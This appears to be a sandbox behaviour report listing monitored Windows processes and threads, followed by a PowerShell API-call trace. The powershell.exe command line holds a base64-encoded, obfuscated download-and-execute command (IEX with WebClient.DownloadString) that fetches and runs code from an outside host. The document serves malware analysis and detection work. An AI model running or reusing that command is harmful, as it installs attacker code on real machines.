	id = 671
	os_tid = 0x14e0


Thread:
	id = 674
	os_tid = 0x14f8


Thread:
	id = 679
	os_tid = 0x1530


Thread:
	id = 680
	os_tid = 0x1540


Thread:
	id = 684
	os_tid = 0x1564


Thread:
	id = 688
	os_tid = 0x15a8


Thread:
	id = 702
	os_tid = 0x15ec


Thread:
	id = 715
	os_tid = 0x1620


Thread:
	id = 725
	os_tid = 0x164c


Thread:
	id = 729
	os_tid = 0x1664


Thread:
	id = 733
	os_tid = 0x1680


Thread:
	id = 738
	os_tid = 0x16ac


Thread:
	id = 740
	os_tid = 0x16c4


Thread:
	id = 757
	os_tid = 0x1758


Thread:
	id = 763
	os_tid = 0x1794


Thread:
	id = 772
	os_tid = 0x17d0


Thread:
	id = 779
	os_tid = 0x140c


Thread:
	id = 802
	os_tid = 0x1054


Thread:
	id = 805
	os_tid = 0x1058


Thread:
	id = 815
	os_tid = 0x1098


Thread:
	id = 817
	os_tid = 0x153c


Thread:
	id = 819
	os_tid = 0x10c4


Thread:
	id = 835
	os_tid = 0x15ec


Thread:
	id = 838
	os_tid = 0x16ac


Thread:
	id = 840
	os_tid = 0x125c


Thread:
	id = 847
	os_tid = 0x1734


Thread:
	id = 872
	os_tid = 0xc98


Thread:
	id = 874
	os_tid = 0xcbc


Thread:
	id = 888
	os_tid = 0x6bc


Thread:
	id = 900
	os_tid = 0x13d4


Thread:
	id = 903
	os_tid = 0x180c


Thread:
	id = 908
	os_tid = 0x183c


Thread:
	id = 916
	os_tid = 0x1878


Thread:
	id = 923
	os_tid = 0x18a4


Thread:
	id = 925
	os_tid = 0x18b8


Thread:
	id = 928
	os_tid = 0x18d8


Thread:
	id = 933
	os_tid = 0x18f8


Thread:
	id = 953
	os_tid = 0x198c


Thread:
	id = 973
	os_tid = 0x1a00


Thread:
	id = 983
	os_tid = 0x1a34


Thread:
	id = 1003
	os_tid = 0x1aac


Thread:
	id = 1011
	os_tid = 0x1ae8


Thread:
	id = 1017
	os_tid = 0x1b08


Thread:
	id = 1027
	os_tid = 0x1b50


Thread:
	id = 1031
	os_tid = 0x1b70


Thread:
	id = 1038
	os_tid = 0x1b9c


Thread:
	id = 1040
	os_tid = 0x1bb4


Thread:
	id = 1046
	os_tid = 0x1bdc


Thread:
	id = 1052
	os_tid = 0x139c


Thread:
	id = 1093
	os_tid = 0x15d8


Thread:
	id = 1103
	os_tid = 0x1608


Thread:
	id = 1116
	os_tid = 0x16d8


Thread:
	id = 1127
	os_tid = 0x198c


Thread:
	id = 1139
	os_tid = 0x175c


Thread:
	id = 1150
	os_tid = 0x15a8


Thread:
	id = 1159
	os_tid = 0x1ae0


Thread:
	id = 1164
	os_tid = 0x1780


Thread:
	id = 1175
	os_tid = 0xcb8


Thread:
	id = 1182
	os_tid = 0xc38


Thread:
	id = 1197
	os_tid = 0x1924


Thread:
	id = 1202
	os_tid = 0xce8


Thread:
	id = 1209
	os_tid = 0x19b0


Thread:
	id = 1214
	os_tid = 0x19f8


Thread:
	id = 1220
	os_tid = 0x1958


Thread:
	id = 1229
	os_tid = 0x19b0


Thread:
	id = 1237
	os_tid = 0x191c


Thread:
	id = 1250
	os_tid = 0x1c28


Thread:
	id = 1269
	os_tid = 0x1ca4


Thread:
	id = 1287
	os_tid = 0x1d18


Thread:
	id = 1296
	os_tid = 0x1d4c


Thread:
	id = 1307
	os_tid = 0x1d8c


Thread:
	id = 1312
	os_tid = 0x1dac


Thread:
	id = 1328
	os_tid = 0x1e10


Thread:
	id = 1335
	os_tid = 0x1e34


Thread:
	id = 1345
	os_tid = 0x1e6c


Thread:
	id = 1353
	os_tid = 0x1eb8


Thread:
	id = 1357
	os_tid = 0x1ed4


Thread:
	id = 1382
	os_tid = 0x1f68


Thread:
	id = 1388
	os_tid = 0x1f88


Thread:
	id = 1410
	os_tid = 0x1ff8


Thread:
	id = 1438
	os_tid = 0xb80


Thread:
	id = 1458
	os_tid = 0x1a38


Thread:
	id = 1469
	os_tid = 0x1a84


Thread:
	id = 1476
	os_tid = 0x1e6c


Thread:
	id = 1490
	os_tid = 0x1c24


Thread:
	id = 1506
	os_tid = 0x1d30


Thread:
	id = 1521
	os_tid = 0x1df0


Thread:
	id = 1536
	os_tid = 0x2030


Thread:
	id = 1553
	os_tid = 0x2094


Thread:
	id = 1558
	os_tid = 0x20ac


Thread:
	id = 1606
	os_tid = 0x21b0


Thread:
	id = 1626
	os_tid = 0x221c


Thread:
	id = 1663
	os_tid = 0x22c8


Thread:
	id = 1672
	os_tid = 0x2310


Thread:
	id = 1676
	os_tid = 0x2330


Thread:
	id = 1679
	os_tid = 0x2344


Thread:
	id = 1688
	os_tid = 0x238c


Thread:
	id = 1709
	os_tid = 0x23f4


Thread:
	id = 1716
	os_tid = 0x1ea0


Thread:
	id = 1721
	os_tid = 0x21ac


Thread:
	id = 1730
	os_tid = 0x1f40


Thread:
	id = 1745
	os_tid = 0x1818


Thread:
	id = 1768
	os_tid = 0x1c48


Thread:
	id = 1801
	os_tid = 0x1924


Thread:
	id = 1814
	os_tid = 0x1c48


Thread:
	id = 1824
	os_tid = 0x1fe8


Thread:
	id = 1842
	os_tid = 0x2448


Process:
	id = "2"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x15f04000"
	os_pid = "0x3f8"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Local Service"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dc17" [0xc000000f], "LOCAL" [0x7]


Thread:
	id = 12
	os_tid = 0x960


Thread:
	id = 13
	os_tid = 0x664


Thread:
	id = 14
	os_tid = 0x5b4


Thread:
	id = 15
	os_tid = 0x76c


Thread:
	id = 16
	os_tid = 0x758


Thread:
	id = 17
	os_tid = 0x72c


Thread:
	id = 18
	os_tid = 0x71c


Thread:
	id = 19
	os_tid = 0x718


Thread:
	id = 20
	os_tid = 0x154


Thread:
	id = 21
	os_tid = 0x120


Thread:
	id = 22
	os_tid = 0x3fc


Thread:
	id = 24
	os_tid = 0xbf8


Thread:
	id = 401
	os_tid = 0x1030


Thread:
	id = 776
	os_tid = 0x17f0


Thread:
	id = 1009
	os_tid = 0x1ac4


Thread:
	id = 1262
	os_tid = 0x1c7c


Thread:
	id = 1463
	os_tid = 0x908


Thread:
	id = 1728
	os_tid = 0x1fdc


Thread:
	id = 2053
	os_tid = 0x1e48


Process:
	id = "3"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3378a000"
	os_pid = "0x7a8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 27
	os_tid = 0x7ac

	[0241.363] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0242.143] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0242.143] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0242.143] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0242.143] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0245.435] GetVersionExW (in: lpVersionInformation=0x20d880*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20d880*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.437] GetVersionExW (in: lpVersionInformation=0x20d880*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20d880*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.448] GetVersionExW (in: lpVersionInformation=0x20d5f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20d5f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.448] SetErrorMode (uMode=0x1) returned 0x1
	[0245.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x20d750 | out: lpFileInformation=0x20d750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0245.450] SetErrorMode (uMode=0x1) returned 0x1
	[0245.452] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x20d9c0 | out: lpdwHandle=0x20d9c0) returned 0x94c
	[0245.454] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b772d8 | out: lpData=0x2b772d8) returned 1
	[0245.456] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20d938, puLen=0x20d930 | out: lplpBuffer=0x20d938*=0x2b77374, puLen=0x20d930) returned 1
	[0245.458] lstrlenW (lpString="䅁") returned 1
	[0245.465] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x20d8a8, puLen=0x20d8a0 | out: lplpBuffer=0x20d8a8*=0x2b77450, puLen=0x20d8a0) returned 1
	[0245.466] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0245.467] CoTaskMemAlloc (cb=0x2e) returned 0x49aad0
	[0245.467] lstrcpyW (in: lpString1=0x49aad0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0245.468] CoTaskMemFree (pv=0x49aad0) 
	[0245.468] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x20d8a8, puLen=0x20d8a0 | out: lplpBuffer=0x20d8a8*=0x2b774a4, puLen=0x20d8a0) returned 1
	[0245.468] lstrlenW (lpString="System.Management.Automation") returned 28
	[0245.468] CoTaskMemAlloc (cb=0x3c) returned 0x498510
	[0245.468] lstrcpyW (in: lpString1=0x498510, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0245.468] CoTaskMemFree (pv=0x498510) 
	[0245.468] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x20d8a8, puLen=0x20d8a0 | out: lplpBuffer=0x20d8a8*=0x2b77500, puLen=0x20d8a0) returned 1
	[0245.468] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0245.468] CoTaskMemAlloc (cb=0x20) returned 0x499010
	[0245.468] lstrcpyW (in: lpString1=0x499010, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0245.468] CoTaskMemFree (pv=0x499010) 
	[0245.468] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x20d8a8, puLen=0x20d8a0 | out: lplpBuffer=0x20d8a8*=0x2b77540, puLen=0x20d8a0) returned 1
	[0245.469] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0245.469] CoTaskMemAlloc (cb=0x44) returned 0x498510
	[0245.469] lstrcpyW (in: lpString1=0x498510, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0245.469] CoTaskMemFree (pv=0x498510) 
	[0245.469] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x20d8a8, puLen=0x20d8a0 | out: lplpBuffer=0x20d8a8*=0x2b775a8, puLen=0x20d8a0) returned 1
	[0245.469] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0245.469] CoTaskMemAlloc (cb=0x76) returned 0x4455c0
	[0245.469] lstrcpyW (in: lpString1=0x4455c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0245.469] CoTaskMemFree (pv=0x4455c0) 
	[0245.469] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x20d8a8, puLen=0x20d8a0 | out: lplpBuffer=0x20d8a8*=0x2b77644, puLen=0x20d8a0) returned 1
	[0245.469] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0245.469] CoTaskMemAlloc (cb=0x44) returned 0x498510
	[0245.469] lstrcpyW (in: lpString1=0x498510, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0245.898] CoTaskMemFree (pv=0x498510) 
	[0245.898] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x20d8a8, puLen=0x20d8a0 | out: lplpBuffer=0x20d8a8*=0x2b776a8, puLen=0x20d8a0) returned 1
	[0245.898] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0245.898] CoTaskMemAlloc (cb=0x58) returned 0x464230
	[0245.898] lstrcpyW (in: lpString1=0x464230, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0245.898] CoTaskMemFree (pv=0x464230) 
	[0245.898] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x20d8a8, puLen=0x20d8a0 | out: lplpBuffer=0x20d8a8*=0x2b77724, puLen=0x20d8a0) returned 1
	[0245.898] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0245.898] CoTaskMemAlloc (cb=0x20) returned 0x499010
	[0245.898] lstrcpyW (in: lpString1=0x499010, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0245.898] CoTaskMemFree (pv=0x499010) 
	[0245.898] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x20d8a8, puLen=0x20d8a0 | out: lplpBuffer=0x20d8a8*=0x2b773cc, puLen=0x20d8a0) returned 1
	[0245.898] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0245.898] CoTaskMemAlloc (cb=0x66) returned 0x48bc10
	[0245.898] lstrcpyW (in: lpString1=0x48bc10, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0245.898] CoTaskMemFree (pv=0x48bc10) 
	[0245.898] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x20d8a8, puLen=0x20d8a0 | out: lplpBuffer=0x20d8a8*=0x0, puLen=0x20d8a0) returned 0
	[0245.898] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x20d8a8, puLen=0x20d8a0 | out: lplpBuffer=0x20d8a8*=0x0, puLen=0x20d8a0) returned 0
	[0245.898] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x20d8a8, puLen=0x20d8a0 | out: lplpBuffer=0x20d8a8*=0x0, puLen=0x20d8a0) returned 0
	[0245.899] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20d878, puLen=0x20d870 | out: lplpBuffer=0x20d878*=0x2b77374, puLen=0x20d870) returned 1
	[0245.899] CoTaskMemAlloc (cb=0x204) returned 0x447d90
	[0245.899] VerLanguageNameW (in: wLang=0x0, szLang=0x447d90, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0245.901] CoTaskMemFree (pv=0x447d90) 
	[0245.901] VerQueryValueW (in: pBlock=0x2b772d8, lpSubBlock="\\", lplpBuffer=0x20d8c8, puLen=0x20d8c0 | out: lplpBuffer=0x20d8c8*=0x2b77300, puLen=0x20d8c0) returned 1
	[0245.905] GetCurrentProcessId () returned 0x7a8
	[0245.918] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x20c7f0 | out: lpLuid=0x20c7f0*(LowPart=0x14, HighPart=0)) returned 1
	[0245.920] GetCurrentProcess () returned 0xffffffffffffffff
	[0245.921] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x20c810 | out: TokenHandle=0x20c810*=0x2ec) returned 1
	[0245.922] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2b7ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0245.923] CloseHandle (hObject=0x2ec) returned 1
	[0245.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a8) returned 0x2ec
	[0245.934] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2b7abb8, cb=0x200, lpcbNeeded=0x20d828 | out: lphModule=0x2b7abb8, lpcbNeeded=0x20d828) returned 1
	[0245.936] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f370000, lpmodinfo=0x2b7ae28, cb=0x18 | out: lpmodinfo=0x2b7ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0245.937] CoTaskMemAlloc (cb=0x804) returned 0x4a2650
	[0245.937] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f370000, lpBaseName=0x4a2650, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0245.937] CoTaskMemFree (pv=0x4a2650) 
	[0246.362] CoTaskMemAlloc (cb=0x804) returned 0x4a2650
	[0246.362] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f370000, lpFilename=0x4a2650, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0246.363] CoTaskMemFree (pv=0x4a2650) 
	[0246.363] CloseHandle (hObject=0x2ec) returned 1
	[0246.369] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x7a8) returned 0x2ec
	[0246.370] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x20d958 | out: lpExitCode=0x20d958*=0x103) returned 1
	[0246.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b7b088, Length=0x20000, ResultLength=0x20d920 | out: SystemInformation=0x12b7b088, ResultLength=0x20d920*=0xf4a0) returned 0x0
	[0246.387] EnumWindows (lpEnumFunc=0x28f66ac, lParam=0x0) returned 1
	[0246.387] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x558
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x538
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x778
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x778
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.388] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.389] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.389] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.389] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.389] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x460
	[0246.389] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.389] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.389] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x924
	[0246.389] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x8dc
	[0246.389] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x7dc
	[0246.389] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x768
	[0246.389] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x764
	[0246.390] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x820
	[0246.390] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x810
	[0246.390] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x794
	[0246.390] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x83c
	[0246.390] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x7ac
	[0246.391] GetWindow (hWnd=0x501be, uCmd=0x4) returned 0x0
	[0246.392] IsWindowVisible (hWnd=0x501be) returned 0
	[0246.392] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0xb44
	[0246.392] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0xb5c
	[0246.392] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x838
	[0246.392] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.392] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.392] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.392] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
